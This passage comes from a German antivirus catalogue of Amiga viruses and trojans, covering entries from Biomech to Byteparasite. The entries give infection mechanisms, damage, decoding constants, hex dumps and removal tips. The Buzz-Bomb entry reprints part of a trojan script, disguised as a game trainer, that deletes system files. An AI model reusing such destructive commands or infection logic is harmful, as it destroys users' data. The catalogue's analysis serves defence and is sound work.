des gepackten Zerstoerungsteils: 3208 Bytes Alle Texte sind jetzt codiert. Ablauf: Im cli erfolgt zuerst die Ausgabe: ... catch me if you can - b i o m e c h a n i c - Da MUSS jeder gewarnt sein. Fuehren Sie SOFORT eine Reset aus. Betroffene Verzeichnisse sys:c, sys:libs, sys:l, sys:devs und sys:prefs Die fuenf Bytes aendern sich : 00 02 E7 60 00 File vorher: File nachher: z.B. Addbuffers fe266034 220a7400 .&`4".t. : fe266034 0002e760 .&`4...` 4eaefd24 2c004a86 N..$,.J. : 00aefd24 2c004a86 ...$,.J. oder z.B. Dir 0018082a 00060125 ...*...% : 0018082a 00060002 ...*.... 6600036a 7014b0aa f..jp... : e760006a 7014b0aa .`.jp... Auf das "veraenderte" Medium wird als leerer Dir-Name geschrie- ben: biomechanic trashed your hd!! - Biomech-TypG-Trojaner Die fuenf Bytes : 000224fe00 68030: ja (nocache) Filename: introvirus (ja so habe ich ihn erhalten) Laenge: 4428 Bytes Laenge des gepackten Zerstoerungsteils: 3332 Bytes oder Filename: Ami-Hacker Laenge: 6940 Bytes Mit der 4Eb9-Methode wurden zwei Files zusammengelinkt. Ein Biomech (Laenge gepackt 3332 Bytes, entpackt 5412 Bytes) und ein Ami-Hacker). Ami-Hacker existiert seit langer Zeit auch als eigenstaendiges File. Siehe oben bei Ami-Hacker. oder Filename: Viruschecker V6.59 (gibt es noch gar nicht) Laenge: 55428 Bytes Laenge des gepackten Zerstoerungsteils: 4944 Bytes Mit der 4Eb9-Methode wurden zwei Files zusammengelinkt. Alle Texte sind jetzt codiert. Ablauf: Im cli erfolgt zuerst die Ausgabe: ... catch me if you can - b i o m e c h a n i c - Da MUSS jeder gewarnt sein. Fuehren Sie SOFORT eine Reset aus. Betroffene Verzeichnisse sys:c, sys:libs, sys:l, sys:devs und sys:prefs Die fuenf Bytes aendern sich bei mir : 00 02 24 FE 00 File vorher: File nachher: z.B. dir 0018082a 00060125 ...*...% : 0018082a 00060002 ...*.... ^^^^ 6600036a 7014b0aa f..jp... : 24fe006a 7014b0aa $..jp... ^^^^^^ Auf das "veraenderte" Medium wird als leerer Dir-Name geschrie- ben: biomechanic trashed your hd!! - Biomech-TypH-Trojaner Die fuenf Bytes : 00 02 b9 b2 00 Der Unterschied zu Typ A ist im Prg-Code zu gross, um das Teil dort einzuordnen A4000: ja Filename: ORB95 Laenge : 3176 Bytes KEINE verbogenen Vektoren KEINE Vermehrung VT erkennt NUR das Ausloeserfile !! Warum ich das File ORB95 freiwillig starten sollte: Keine Ahnung (das File besteht nur aus dem Zerstoerungsteil) Im File ist zu lesen: 4e5d4e75 b9b20073 79733a70 72656673 N]Nu...sys:prefs 2f007379 733a6465 76732f00 7379733a /.sys:devs/.sys: 6c2f0073 79733a63 2f007379 733a6c69 l/.sys:c/.sys:li 62732f00 4f524239 350a0000 bs/.ORB95.. Der Text ORB95 wird im cli ausgegeben und duerfte der Taeuschung dienen. In Wirklichkeit werden die Unterverzeichnisse von sys: prefs, devs, l, c und libs durchsucht. File vorher: File nachher: printer.device 4eb90000 08582200 N....X". : 4eb90000 08582200 N....X". 508f6608 4eb90000 P.f.N... : 0002b9b2 00b90000 ........ ^^^^^^^^ ^^ ^^^^^^^^ ^^ Es werden also immer 5 Bytes geschrieben = 00 02 b9 b2 00 . Ein System dabei habe ich nicht gefunden. Die Files sind leider NICHT mehr zu retten. VT erkennt veraenderte Files NICHT, da mir die Gefahr der Fehl- erkennung bei nur fuenf Bytes zu gross ist. Falls Sie Bedenken in Ihrem System haben, weil auf Ihrer Festplatte das Ausloeser- file war, dann probieren Sie einen Filemonitor (z.B. hex). Geben Sie im Suchstring $0002b9b2 ein und untersuchen Sie in den bestimmten Unterverzeichnissen die Files. Es geht schnell. Ich habs mit dem c-Verzeichnis probiert. - BLACK KNIGHT Virus BB im Speicher immer ab $7F300 Cool $7F394, DoIo $7F3BC KS2.04: ja Fordert trackdisk.device NICHT Namensbegruendung: decodiert ist im BB zu lesen BLACK KNIGHT (12/11/91) Virus meldet sich nicht. - BLACKFLASH V2.0 Cool, DoIo, FastMem ja im Speicher immer ab $7F000 Zaehlzelle = $13 Textausgabe mit Graphikroutine (s.u.) Schrift rot, Hintergrund schwarz Vermehrung: ueber BB Text steht unverschluesselt im BB: HELLO, I AM AMIGA ! PLEASE HELP ME ! I FEEL STICK ! I HAVE A VIRUS ! ! BY BLACKFLASH ! - BlackStar anderer Name: Starfire1/NorthStar1 siehe dort - Blade Runners SCA-Clone, immer ab 7EC00, Cool, im Prg. DoIo Text: Hello! We are the Blade Runners! u.s.w. - BLF-Virus immer ab $7F000, Cool, DoIo, BeginIo loescht KickTag usw. Virusprogramm meldet sich NICHT. Programmteil decodiert mit eori.b #$28,(a1)+ u.a. zu lesen: This is the new virus by BLF Schaden und Vermehrung: BB - Blieb6-BBS-Trojan Laenge: 7612 Bytes KEINE verbogenen Vektoren KEINE Vermehrung Name von Filenamen (blieb6.exe) uebernommen. Gegen welches BBS-Prg. ist mir unbekannt. Vor ein gepacktes Original-File wurden einige Dos-Routinen ge- haengt. 00006468 303a6262 732f636f 6e666967 ..dh0:bbs/config 31006468 313a6262 732f636f 6e666967 1.dh1:bbs/config 3100223c 0000 1.. Nach diesen Files wird gesucht. Falls sie gefunden werden, wird ein GEAENDERTER Inhalt mit der Laenge #1972 Bytes zurueckge- schrieben. Im gepackten Teil koennen Sie nach dem Entpacken Lesen z.B.: 20426c69 65622056 352e3020 20282d3a Blieb V5.0 (-: 426c7565 20426f78 2050726f 3a2d2920 Blue Box Pro:-) 62792021 202d4d2d 442d442d 20212050 by ! -M-D-D- ! P Vielleicht hilft Ihnen das weiter. VT bietet nur Loeschen an. - BlowJob KickTag, KickCheckSum, im Prg. DoIo u. $6c, immer $7f000 Taeuscht durch Text Memory Allocator 3.01 vor Vermehrung und Schaden: Bootblock Sobald die Zaehlzelle den Wert $7530 erreicht hat, wird ein Programmteil mit subi.b #$71,D0 entschluesselt und mit display- Alert der Text ausgegeben: ONCE AGAIN SOMETHING WONDERFULL HAPPENED (HE HE HE) PLEASE POWER OFF - PLEASE POWER OFF - PLEASE POWER OFF - BlueBox Filevirus, keine bekannten Vectoren werden verbogen Laenge (gecrunched) 5608, nur Kreset (tut mit leid) gedacht fuer Modembesitzer und Mailboxbetreiber, aber KEINE Voraussetzung fuer Vermehrung (enthaelt Source fuer seriellen Port $DFF030, $DFF018 ???!!!??? behindert Verbindung?!?!) Das gecrunchte Prg. (Bluebox) besteht aus 3 Teilen: - ein Taeuschprogramm: ermoeglicht Tonfolge mit Zehnertastatur - eine komplette icon.library - Laenge:6680 - zusaetzlicher Text: input.device , RAM: - andere Jahreszahl - ein Kopierteil fuer falsche icon.library - testet ob icon.library schon existiert, falls nein KEINE Aenderung - testet ob Disk validated - setzt Protection-Bits zurueck - kopiert falsche icon.library - arbeitet auch mit HD !!!!!! Nach einem Reset wird ueber icon.library ein Process 'input.device ' (mit Leerzeichen) gestartet. VT findet diesen Process, kann ihn aber nicht beenden (KReset). Erstellt auf RAM: ein unsichtbares ($A0) File (nicht immer). Ausbauhinweise: VT erkennt den VirusTraeger Bluebox nur als crunched !! Ignorieren Sie das Kreset-Angebot und loeschen Sie zuerst die falsche icon.library. Kopieren Sie dann die Original- icon.library auf die Disk oder HD (sonst nach Reset keine WB!!!). Zum Schluss starten Sie bitte das Kreset-Prg. Meine Maschine verhielt sich danach wieder normal. Dies kann bei Modemprg. oder MailboxPrg. anders sein ??? Probleme bitte melden. Danke Herkunft: Bluebox.lzh 23033 Bytes -Bluebox 5608 (noch einmal gecrunched) -Bluebox.info 325 -Bluebox.DOC 37271 -Bluebox.DOC.info 354 - bnuke15-Virus BBS-Bomb siehe unten bei scan.x - Bobble-Signum-Virus File siehe unten bei GENERALHUNTER - BOKOR-Virus Link Fileverlaengerung: variabel #1304-1332 Bytes Verbogener Vektor: LoadSeg Namensbegruendung: s.u. KS1.3: nein 68000: nein Die Codierung ist bei jeder Vermehrung neu mit EOR . Verwendet werden: $DFF006 und $DFF007 Namensbegruendung: Im decodierten Virusteil ist zu lesen: 00144eae ffdc60ea 69627261 49425241 ..N...`.ibraIBRA 65766963 45564943 646c6572 444c4552 evicEVICdlerDLER 69727573 49525553 72696e74 52494e54 irusIRUSrintRINT ;.... da142807 91c22248 000000b1 424f4b4f ..(..."H....BOKO 52204953 48455245 323c0136 41fafee6 R ISHERE2<.6A... Speichereinbindung: Ueber LoadSeg Link an ein File: Medium nicht schreibgeschuetzt File ausfuehrbar (3F3) 1.Hunklaenge ungleich 4x($13D bis $145) (Virus selbst) Filelaenge max. #300000 Bytes Teile von Filenamen s.o. (wg. libs) werden nicht gefunden. Das Teil linkt sich als neuer 1.Hunk vor den Original-1.Hunk. Es wird auch ein 3EC-Hunk erzeugt. VT versucht das Teil auszubauen. VT sollte das Teil im Speicher finden und abschalten. - BOKOR1.05-Virus Link Fileverlaengerung: variabel #1504-1532 Bytes Das Teil codiert sich bei der Vermehrung neu mit EOR oder ADD . Aber es koennen auch uncodierte Linkteile entstehen. Verwendet werden: $DFF006, $DFF007 und $DFF02A Verbogener Vektor: LoadSeg Namensbegruendung: s.u. KS1.3: nein 68000: nein Namensbegruendung: Im decodierten Virusteil ist zu lesen: ffdc60ea 646c6572 444c4552 69727573 ..`.dlerDLERirus 49525553 64657673 44455653 44657673 IRUSdevsDEVSDevs 72747570 52545550 646f732e 6c696272 rtupRTUPdos.libr ;..... 000000af 424f4b4f 52205631 2e303521 ....BOKOR V1.05! Speichereinbindung: Ueber LoadSeg Link an ein File: File ausfuehrbar (3F3) 1.Hunklaenge ungleich 4x($16F bis $177) (Virus selbst) Filelaenge min. #1400 Bytes Filelaenge max. #256000 Bytes Teile von Filenamen s.o. (z.B. irus) werden nicht gefunden. Filename enthaelt nicht "." (Ausnahme .exe und .EXE) Falls der Filename ein Leerzeichen ($20) enthaelt, wird der Filename gekuerzt. (Sie muessen dann also nach dem Ausbau den Original-Filenamen erraten. Tut mir leid. Keine andere Loesung moeglich). Das Teil linkt sich als neuer 1.Hunk vor den Original-1.Hunk. Es wird auch ein 3EC-Hunk erzeugt. Schaden: Manchmal werden sinnlose File- und Dir-Namen angezeigt. VT versucht das Teil auszubauen. VT sollte das Teil im Speicher finden und abschalten. - BOKOR1.06-Virus Link Namensbegruendung: Im decodierten Virusteil ist zu lesen: 4a812448 000000b9 424f4b4f 52205631 J.$H....BOKOR V1 2e303621 .06! Die LoadSeg-Routine wurde etwas veraendert. Rest siehe bei BOKOR1.05 . VT erkennt im Speicher BOKOR 1.06 VT erkennt am File BOKOR 1.05 (kein wichtiger Unterschied) - Bokor1.1-LVirus Link Fileverlaengerung: variabel Typ A #1604-1732 Bytes Typ B #1636-1764 Bytes Das Teil codiert sich bei der Vermehrung neu mit EOR oder ADD . Aber es koennen auch uncodierte Linkteile entstehen. Verwendet werden: $DFF006, $DFF007 Verbogener Vektor: LoadSeg Namensbegruendung: s.u. KS1.3: nein 68000: nein Namensbegruendung: Im decodierten Virusteil ist zu lesen: ffdc60ea 646c6572 72747570 49525553 ..`.dlerrtupIRUS 64657673 444c4552 44657673 56697275 devsDLERDevsViru 44455653 52545550 646f732e 6c696272 DEVSRTUPdos.libr 61727900 0020f0ac 00272ed8 54727573 ary.. ...'..Trus 744e6f46 696c6521 35880027 34340003 tNoFile!5..'44.. 4c6f6361 6c65204c 69627261 7279004c Locale Library.L b2804a82 4a80b7c0 70007800 4a812048 ..J.J...p.x.J. H 000000b1 426f6b6f 72205631 2e312121 ....Bokor V1.1!! Speichereinbindung: Ueber LoadSeg Link an ein File: File ausfuehrbar (3F3) 1.Hunklaenge ungleich Typ A 4x($188 bis $1a8) (Virus selbst) Typ B 4x($190 bis $1b0) Filelaenge min. #1400 Bytes Filelaenge max. #256000 Bytes Teile von Filenamen s.o. (z.B. IRUS) werden nicht gefunden. Filename enthaelt nicht "." (Ausnahme .exe und .EXE) Falls der Filename ein Leerzeichen ($20) enthaelt, wird der Filename gekuerzt. (Sie muessen dann also nach dem Ausbau den Original-Filenamen erraten. Tut mir leid. Keine andere Loesung moeglich). Das Teil linkt sich als neuer 1.Hunk vor den Original-1.Hunk. Es wird auch ein 3EC-Hunk erzeugt. VT versucht das Teil auszubauen. VT sollte das Teil im Speicher finden und abschalten. Falls Ihre Festplatte sehr stark verseucht ist, sollten Sie mit Sp-File-Sp-Gadget und DirFTest jedes Unterverzeichnis einzeln bearbeiten. - BOMB-Bootblock es wird dieser Bootblock als Virus weiterge- geben. Die Pruefsumme ist als BOMB lesbar. Es wird nachge- laden von einem hohen Track (habe nur BB). in diesem Track koennten natuerlich VirenRoutinen stehen, aber es kann genausogut ein BB-Lader sein. Bitte schicken Sie mir eine funktionsfaehige Disk mit diesem hohen Track. Danke Nachtrag Dez. 94: Es handelt sich um einen Introlader fuer ein Spiel. Dieser BB darf NICHT geloescht werden, sonst laeuft das Spiel NICHT mehr. AUCH der BB auf der Data-Disk darf NICHT veraendert werden. - boot-aids Virus BB KS2.04: nein Namensbegruendung: im BB ist uncodiert zu lesen: boot-aids by hiv verbogene Vektoren: BeginIo, KickTag, KickCheckSum, SumKick- Data Der Speicherbereich fuer das Virusteil wird mit $DFF007 be- stimmt. Schaeden: In Abhaengigkeit von $DFF006 soll ein Block mit HIV gefuellt werden. Vermehrung: BB Ihnen kommt das bekannt vor ? Erinnert irgendwie an Lamer ! Selbst die Endekennung $abcd ist vorhanden. Gewisse Schreibprobleme sollte man uebersehen im BB: guradians ^^ Clone: STARCOM 5 siehe unten - Bootblock-Paralysator File BB-exe-Laenge: 1444 Ein Utility-Prg. zum Abspeichern eines BBs als aus- fuehrbares File. - BootClock BB und File Loeschen Von der Absicht KEIN Virus A2000 ja A4000 keine Anzeige Dunkler Hintergrund, helle Schrift zeigt Datum und Uhr- zeit. Es gibt einen aktiven und inaktiven Bootblock erstell- bar mit +b oder -b . Der inaktive BB wird als DOS0-BB erkannt, da an $c nicht $4e716150 $43fa003e (=Original) steht. Klingt harmlos, ABER Cool, ExecVec5 und DoIo (nur im Prg) werden verbogen. OHNE Rueckfrage wird der BB geschrieben !!!! Das ist mir zu gefaehrlich, dass jemand einen Spielelader- BB gegen seinen Willen zerstoert. Dringende Empfehlung: Loeschen - BootController File BB-exe-Laenge: 1160 (V2.35) oder 1176 (V1) Ein Utility-Prg. zum Abspeichern eines BBs als aus- fuehrbares File. - BOOTJOB File BB-exe-Laenge:1356 Namensbegruendung: s.u. 23c0003c ,y......N...#..< ^^^^ e3b4 237c ..C...N...C...#. ^^^^ 003ce3a4 ^^^^^^^^ 45442057 49544820 424f4f54 4a4f4220 ED WITH BOOTJOB 56312e30 30205752 49545445 4e204259 V1.00 WRITTEN BY Ein Utility-Prg. zum Abspeichern eines BBs als aus- fuehrbares File. Bei Filetest und BlockKette wird BootJob erkannt. Wenn Sie wissen wollen, um welchen BB es sich handelt, gehen Sie bitte in den File-Req., klicken das File an und klicken dann auf Filetest. Es werden 2 absolute Adressen verwendet (^^^). Was macht der User, der dort keinen Speicher hat ? Empfehlung: Loeschen - BOOTJOB V1.3 File BB-exe-Laenge:1356 Fehler mit absoluten Adressen behoben. - Bootshop siehe VTkennt L-Z schaedliche Programme (ganz unten) - BootUte File BB-exe-Laenge: 1220 oder 1052 Ein Utility-Prg. zum Abspeichern eines BBs als aus- fuehrbares File. - BOOTX-Virus BB KickTag, KickCheckSum auch KS2.04 anderer Name: PERVERSE I Taeuschungsversuch durch lesbaren Text in BB: BOOTX-Viruskiller by P.Stuer verraet sich bei mir bei gesetztem Schreibschutz durch Systemrequest read/write error Vermehrung: BB Schaeden: faengt ueber input.device Tastatureingaben ab und gibt Text aus. Der Text steht als RAW-Code im BB (amerik.Tastatur !!) SOFTWARE_PIRATES RUINED MY EXCELLENT PROFESSIONAL DTP_PROGRAM I REVENGE MYSELF ON THESE IDIOTS BY PROGRAMMING VIRUSES THIS IS PERVERSE I BECAUSE I LIKE ASSHOLE_FUCKING I PROGRAM VIRUSES FOR MS_DOS TOO Eine Weiterarbeit ist NICHT moeglich. Das Virusprogramm muss geloescht werden. - BootXKiller-Virus BB Im Speicher immer ab $7FC00 Verbogene Vektoren: Cool, DoIo, OldOpenLib, WaitPort, DisplayAlert, SetMenuStrip KS 2.04: ja 68030: ja Fordert trackdisk.device nicht. Schreibt unabhaengig von der BB-Kennung (DOS0/1/2/3/4/5) IMMER DOS0. Folge: bei falscher Kennung kommt es zu Lese- oder Schreibfehler. Namensbegruendung: Im BB ist zu lesen: 20766972 7573202d 20426f6f 7458204b virus - BootX K 696c6c65 72000100 80164675 636b2074 iller.....Fuck t 6f20616c 6c202849 2964696f 74696320 o all (I)diotic Vermehrung: BB Meldung: (manchmal mit DisplayAlert) This is Virus - BootX Killer Fuck to all (I)diotic (B)ullshit (M)aschine users Send bug reports to: Mr. Larmer of Wanted Team Poland Schaeden: - Ersetzt Text in der Menue-Leiste von BootX durch BootXKiller. - Menue-Fenster enthaelt nur noch Quit - Verhindert bei BootX die Anzeige des BB.s Dafuer wird 2 Bloecke lang ausgegeben: BootXKiller BootXKiller BootXKiller usw. Wichtiger Hinweis: DisplayAlert und SetMenuStrip werden ueber OldOpenLib veraendert. Ablauf: Es wird geprueft ob intuition.library geoeffnet werden soll. Dann werden die zwei Vektoren verbogen. Aber !!!! Es wird dabei auf zwei Buchstaben "in" geprueft !!!!!! Also werden bei JEDER Library, die mit "in" beginnt, zwei Vektoren verbogen. Der GURU ist Ihnen dann sicher. - BRET HAWNES Filevirus Laenge: 2608 , immer ab $7F000 Kicktag, SumKickData, KickCheckSum, OpenNewLib, $6c Vermehrung und Schaden: schreibt in Root und in 1.Zeile startup: C0A0E0A0C0 nach 20 Minuten blauer Graphikbildschirm und weisse Schrift: GUESS WHO`S BACK ??? VEP. BRET HAWNES BLOPS YOUR SCREEN I`VE TAKEN THE CONTROLL OVER YOUR AMIGA!!! THERE`S ONLY ONE CURE: POWER OFF AND REBOOT ! ! ! ! ! Statt der 10. Vermehrung werden Tracks zerstoert. - Hinweis 01.08.93: Es ist ein Clone aufgetaucht, bei dem nur der lesbare Text (nicht der codierte) geaendert wurde. Wird weiterhin nur als Bret-Virus erkannt. KS2.04 : ja Laenge: 2600 also 8 Bytes kuerzer als Original, weil 03EC-Hunk entfernt wurde. Vermehrt sich das Teil, so ist die Laenge wieder 2608, da der 03EC-Hunk vom Virus angelegt wird. Am Fileanfang: 0000027D 60000018 53544152 4C494748 ...}`...STARLIGH 54203120 50524F44 55435449 4F4E2C79 T 1 PRODUCTION,y Am Fileende: F9526100 FED66000 FA02444F 20594F55 .DO YOU 204C494B 45204D59 20464952 53542056 LIKE MY FIRST V 49525553 203F2044 4F4E4520 4259204D IRUS ? DONE BY M 43444A2D 4444454E 49545921 20323130 CDJ-DDENITY! 210 32393000 00000000 000003F2 000003EB 290.... Wird vielleicht von anderen AntivirusPrg als Starlight - Virus erkannt. VT bleibt bei BRET HAWNES. - BS1! (noch ein SCA ) - BULGARIA Virus File BYTEPARASITE III - Clone s.u. - Bulletin-Trojan Zerstoerungsfile Trojan-Name von Filename uebernommen (wird wahrscheinlich als Demo weitergegeben) Laenge: 77740 Bytes KEINE verbogenen Vektoren Kann sich selbst NICHT vermehren. Mehrfach gepackt. Am Anfang wurde ein 3E8-Hunk (*Art) gelinkt, um die Packerer- kennung zu erschweren. Im File wird mit der 4EB9-4EF9-Methode gearbeitet. Im entpackten File ist zu lesen: 62726172 7900533a 00496e73 70656374 brary.S:.Inspect 6f722058 206f6620 412e4c2e 46ff0000 or X of A.L.F... Schaeden: In S: werden alle Files geoeffnet und veraendert. Shell-Startup vorher: ; $VER: Shell-Startup 40.1 (9.2.93) Prompt "%N.%S> " ;...... Shell-Startup nachher: Inspector X of A.L.Fp 40.1 (9.2.93) Prompt "%N.%S> " ;...... Es wird die Originallaenge zurueckgeschrieben. Auch Icons und ausfuehrbare Files werden veraendert. Eine Routine um das Schreibschutz-Bit zu veraendern, wurde NICHT gefunden. Eigentlich sollten noch mehr Unterverzeichnisse veraendert werden. Durch einen Programmierfehler ist das zum Glueck bei meinen Tests nicht gelungen. (2 Bytes verschoben) 62726172 79006262 733a0049 6e737065 brary.bbs:.Inspe 63746f72 2058206f 6620412e 4c2e4620 ctor X of A.L.F 2d20414c 69454e20 4c696645 20664f52 - ALiEN LifE fOR 4dff0000 00000000 00000000 00000000 M............... ;.... 62726172 7900433a 00496e73 70656374 brary.C:.Inspect ;.... 62726172 79004445 56533a00 496e7370 brary.DEVS:.Insp ;.... 62726172 79004c49 42533a00 496e7370 brary.LIBS:.Insp ;.... 62726172 79006262 733a6e6f 6465312f brary.bbs:node1/ ;.... 62726172 79005359 533a0049 6e737065 brary.SYS:.Inspe Der zu schreibende Text (ALieN..) waere also etwas laenger geworden. - BURN-Virus Typ 1 Link und Zerstoerung Keine staendig verbogenen Vektoren (manchmal Dos-Write) Lauffaehigkeit getestet: KS1.3, KS2.04, KS3.0 Verlaengert ein File um 2412 Bytes. Haengt 2 Hunks an. Einen Hunk zu Beginn des Original-Files und einen an das Ende (das ist neu !!!). Kann vorhandenen $3F1-Hunk am Anfang des Original-Files ueber- springen. Baut eigenen Process auf. Ein Name fuer den Process wird in der TaskWait-Liste gesucht. Damit nicht immer derselbe Processname Verwendung findet, wird die max. Laenge der Suchschleife mit - move.b $BFE801,d0 - festgelegt. Falls Sie also in VT/Listen/tasks ploetzlich z.B. 2x ramlib oder 3x Snoopdos ( im Test passiert ) finden, dann sollten bei Ihnen SOFORT die Alarmglocken klingeln. Diese Routine ist EBENFALLS NEU. VT versucht den Process im Speicher zu finden und bietet dann loeschen an (hoffe ich). Da ich nicht gerne Processe abschalte, (GURU-Gefahr), waere ein RESET auch nicht schlecht. Die Arbeit des Processes wird etwas gebremst durch ein DosDelay in Abhaengigkeit von - move.b $BFE601,d1 - . Enthaelt eine Datumsroutine: cmpi.l #$16f9,(a5) = 7.Feb.1994 Wenn dieses Datum ueberschritten ist, soll IMMER zerstoert werden. Ist dieses Datum noch nicht erreicht, so soll zuerst ein Link versucht werden. (DosLock, examine, exnext usw.). Wenn Link miss- lungen dann auch Zerstoerung. Ich habe mehrere Stunden auf verschiedenen Rechnern "geuebt". Es ist mir KEINE Vermehrung gelungen. Falls jemand mehr "Glueck" hat, bitte ich um Zusendung einiger Files. Danke !! Die Link-Routine kennt zuwenig Hunk-Typen. Falls eine Vermehrung wirklich gelingt, duerften haeufig NICHT LAUFFAEHIGE Programme entstehen. Ob VT diese Files durch Ausbau wieder in den Original- Zustand versetzen kann, kann ich nicht beurteilen, da mir die Vermehrung nicht gelungen ist. Zerstoerungsroutine: Der Rigid-Bereich wird erreicht, da die Zeile subq.w #2,d1 vorkommt. Die Laufwerke werden ueber DosEnv besorgt. (dosroot -> dosenv). Disketten mit 11 Sektoren duerften NICHT zerstoert werden (ble.b). BURN wird decodiert mit move.l #$5171c5c8,d1 eori.l #$13249786,d1 Ergebnis in den Sektoren auf meiner SyQuest: 0000: 4255524e 4255524e 4255524e 4255524e BURNBURNBURNBURN 0010: 4255524e 4255524e 4255524e 4255524e BURNBURNBURNBURN 0020: 4255524e 4255524e 4255524e 4255524e BURNBURNBURNBURN 0030: 4255524e 4255524e 4255524e 4255524e BURNBURNBURNBURN Da duerfte nicht viel zu retten sein. - BURN-Virus Typ 2 Link und Zerstoerung Verlaengert ein File um 2428 Bytes Die Vermehrungs-Routine arbeitet jetzt !!!!!!!! Mehrfachlinks an ein File sind moeglich, da eine "Schon-Ver- seucht"-Routine fehlt. Nach 8 Links an echo aufgehoert. Durch andi.b #$f,d0 wird nicht mehr ab 7.Feb.1994 immer zer- stoert, sondern es werden Tage ausgewaehlt. BURN wird nicht mehr geschrieben, sondern BAF00D0D (wenn ueber- haupt), weil Fehler: move.l #$baf00d0d,d1 addi.l #$87654541,d0 ^^ Ergebnis in den Sektoren bei mir: 0000: baf00d0d baf00d0d baf00d0d baf00d0d ................ 0010: baf00d0d baf00d0d baf00d0d baf00d0d ................ 0020: baf00d0d baf00d0d baf00d0d baf00d0d ................ 0030: baf00d0d baf00d0d baf00d0d baf00d0d ................ 0040: baf00d0d baf00d0d baf00d0d baf00d0d ................ Restliches Verhalten siehe bei BURN Typ 1 . - BUTONIC 1.1 anderer Name BAHAN (im BB immer lesbar) Cool, im Prg. DoIo, immer ab $7ec00, FastMem ja Vermehrung: ueber BB wenn DOS0 gefunden Textausgabe mit PrintIText (entschluesselt mit eori.b #-1,d1 nach $7eb0c) im Speicher dann sichtbar: BUTONIC'S VIRUS 1.1 GREETINGS TO HACKMACK ... <GENERATION NR. #####> - Buzz-Bomb-MKI Loesch-Script-File Keine verbogenen Vektoren Namen: Skid_Row-SSII Laenge: 57449 Bytes Skid_Row-SSII.info Laenge: 950 Bytes Inhalt des ersten Files (gekuerzt): echo " " echo " Silent Service II " echo " " echo " Mega-Trainer " echo " " echo " by - SKID ROW " Echo " " ; ;.... von mir Teile geloescht ;Buzz Bomb MKI, on the Attack... Flying Straight outa Reallity Control ;Coded 9-12-91 by The Christening Man, if your reading this, Congrats... ;BBBBBBBBBBBBBBBBBBBBBBBBBBBBZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ ;BBBBBBBBBBBBBBBBBBBBBBBBBBBBZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ ;BBBBBBBBBBBBBBBBBBBBBBBBBBBBZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ Delete Sys:c/cd ;.....von mir geloescht..... echo "Working..." ;geloescht ..... Delete SYS:c/loadWb Delete SYS:c/Assign Delete SYS:s/Startupii Delete SYS:Libs/Mathieeedoubbas.library Delete SYS:Devs/mountlist Delete Sys:Devs/Serial.device Delete Sys:L/Newcon-handler Echo >sr "Wait 5" echo >>sr "Delete Skid_Row-SSII" ;You have reached the end you Stupid Fuck!!! run execute sr quit Durch das Icon wird IconX aufgerufen und das File abgearbeitet. Ueber echo wird zuerst ein Taeuschtext ausgegeben und dann mehrfach delete aufgerufen. Die Laenge von 57449 Bytes ergibt sich durch staendige Wiederholung der Zeilen ;Buzz .... ZZ . Weiterhin wird ein File mit dem Namen sr und Laenge 119 Bytes angelegt. Inhalt sr-File: 57616974 20350a44 656c6574 6520536b Wait 5.Delete Sk 69645f52 6f772d53 5349490a 3b42757a id_Row-SSII.;Buz 7a20426f 6d62204d 4b49202d 20627920 z Bomb MKI - by 54686520 43687269 7374656e 696e6720 The Christening 4d616e0a 3b502e53 2e20596f 7572202a Man.;P.S. Your * 20465543 4b494e47 204c414d 45202a20 FUCKING LAME * 2620536b 69642052 6f772c20 5355434b & Skid Row, SUCK 204d4521 21210a00 00000000 00000000 ME!!!.......... VT bietet Loeschen an. - BX-Updater-Bomb File Laenge: 2052 Keine verbogenen Vektoren. Namensbegruendung: es wird ein Fenster geoeffnet, das fol- genden Text in der Fensterleiste enthaelt: ff224e75 5241573a 302f302f 3634302f ."NuRAW:0/0/640/ 3230302f 426f6f74 582d5570 64617465 200/BootX-Update 72206279 20534849 20536166 65204865 r by SHI Safe He usw. Im Fenster selbst wird sinnloser Text ausgegeben, der den Ruf von SHI schaedigen soll. In Wirklichkeit wird ein format QUICK NOICONS ausgefuehrt. Betroffen: WORK, DH0: und DF0: Ein FehlerRequester soll durch das Prg. unterdrueckt werden. VT bietet loeschen an. - Byte Bandit ohne FastMem Begin, KickTag, KickCheckSum, Vec5 KS2.04: nein bei mir Guru 4 Im BB ist zu lesen: 56697275 73206279 20427974 65202020 Virus by Byte 42616e64 69742069 6e202039 2e38372e Bandit in 9.87. 4e756d62 6572206f 66202020 20202020 Number of 636f7079 73203a00 0000032d 48e77f7f copys :....-H. ;weit unten .... 74726163 6b646973 6b2e6465 76696365 trackdisk.device 00646f73 2e6c6962 72617279 00000000 .dos.library.... - Byte Bandit 2 anderer Name: No Name 1 s.u. - Byte Bandit Clone ohne Fastmem Diff zu OrigByteBandit: 180 Bytes ( Byte B.. Text wurde aus BB entfernt !!) - ByteBanditError das OriginalByteBanditVirusPrg. beginnt im BB bei $0C, hier bei $32 Da die alte BB-Copy Routine verwendet wird, ist das 1.LW im neuen Copy-BB nicht DOS0, d.h. die neu verseuchte Disk ist "Not a DOS-Disk" also weder boot- noch vermehrungsfaehig - ByteBanditPlus Kick1.2 ohne FastMem Begin, KickTag, KickCheckSum, Vec5 Diff zu OBB: 92 Bytes (zusaetzlich trackdisk.... entfernt) - ByteParasite reines Zerstoerungsprogramm Laenge: 2108 soll auch $6c verbiegen, aber vorher GURU Schaeden: soll zwischen cd, dir und startup-sequence je 1 Byte austauschen, aber sehr sehr schlecht programmiert (Anfaenger spielt besser mit dem Joystick). Deshalb meist GURU. Keine Vermehrung, keine Textausgabe - BYTEPARASITE II File, Laenge ungepackt: 908 Bytes Auch mit KS2.04, keine Vektoren verbogen Taeuscht durch das Zeigen einer Fensterleiste: VirusX: Checking Device Df0: Versucht dann von df0:c VirusX nach df1:c zu kopieren und verraet sich so wenn in df1: keine Disk liegt durch einen Requester. Gefahr der Vermehrung besteht nur wenn BYTEPARASITE II als VirusX getarnt in df0:c vorhanden ist. Aus dem Text im File kann geschlossen werden, dass damit ein Antivirusprogrammierer geaergert werden soll: But now send me to : (Adresse) - BYTEPARASITE III File, Laenge ungepackt: 2160 Bytes Cool, KickMem, KickCheckSum (teilweise sinnlose Werte ausser- halb des vorhandenen Speichers) $6c (sinnvoller Wert) Das Programm MUSS !!!! im Speicher geloescht werden, sonst erscheint nach einigen Arbeiten mit dem Computer sicher Task held usw. . Dies ist nicht Absicht, sondern die sinnlosen Werte sind verantwortlich. Taeuscht durch das Zeigen 